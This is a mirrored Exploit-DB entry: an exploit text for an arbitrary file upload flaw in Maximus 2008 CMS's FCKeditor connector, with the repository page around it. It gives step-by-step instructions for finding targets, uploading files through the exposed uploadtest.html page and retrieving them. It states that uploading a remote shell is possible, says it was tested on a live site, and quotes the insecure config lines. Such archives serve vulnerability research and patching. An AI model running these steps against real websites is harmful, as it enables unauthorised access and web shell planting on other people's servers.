bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15960.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

59 lines
No EOL
2.2 KiB
Text
Raw Blame History

| |
/|_________________________________________________________________________|\
/ \
/===============================================================================\
|Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability |
|develop: http://www.php-maximus.org |
|Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) |
|Tested On: Live site |
|Dork: use your skill and play your imagination :P |
|Author: eidelweiss |
|contact: eidelweiss[at]windowslive[dot]com |
|Home: http://www.eidelweiss.info |
| |
| |
\===============================================================================/
/ NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \
---------------------------------------------------------------------------------
|============================================================================================|
|Original advisories: |
|http://eidelweiss-advisories.blogspot.com/2011/01/maximus-cms-fckeditor-arbitrary-file.html |
|============================================================================================|
exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html
[!] first find the target host
ex: www.site.com or www.target.com/maximus
then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#
[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type
[!] Upload There Hacked.txt or whatever.txt And Copy the Output Link or
[!] after upload without any errors your file will be here: /FCKeditor/upload/
ex: http://site.com//FCKeditor/upload/whatever.txt
NB: remote shell upload also possible !!!
Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"
----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------
and also $Config['AllowedExtensions']['File']
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
=========================| -=[ E0F ]=- |=================================
Reference in a new issue View git blame Copy permalink